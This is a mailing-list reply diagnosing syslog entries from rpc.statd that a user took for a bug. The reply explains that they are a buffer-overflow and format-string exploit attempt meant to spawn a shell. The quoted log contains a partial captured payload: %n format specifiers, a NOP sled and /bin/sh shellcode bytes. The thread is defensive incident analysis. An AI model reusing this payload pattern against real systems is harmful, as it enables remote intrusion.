Re: nfs-common
Brock Murch wrote:
> I have been getting this error every so often in the syslog:
>
> Is this a nfs-common bug? or a syslogd bug?
>
> running:
>
> Linux brockwell 2.2.17 #2 Thu Sep 14 06:08:37 EDT 2000 i486 unknown
>
> all packages from the stable upgrade of that time.
To me this seems an exploit attempt, all the <90> translate with a nop in x86 asm...
> Jan 18 19:16:45 brockwell
> Jan 18 19:16:45 brockwell syslogd: Cannot glue message parts together
> Jan 18 19:16:45 brockwell 173>Jan 18 19:16:45 /sbin/rpc.statd[165]:
> gethostbyname error for ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF>
> <BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n<90>
>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
>
[...]
>
>
> f<CD>
> Jan 18 19:16:45 brockwell
> <C7>^F/bin<C7>F^D/shA0<C0><88>F^G<89>v^L<8D>V^P<8D>N^L<89><F3><B0>^K<CD><80><B0>^A<CD><80><E8>^?<FF><FF>
>
...look the row above, "/bin/sh", not a bug in your daemon, instead a clear attempt to spawn a shell, probably with a buffer-overflow.
Andrea
Reply to: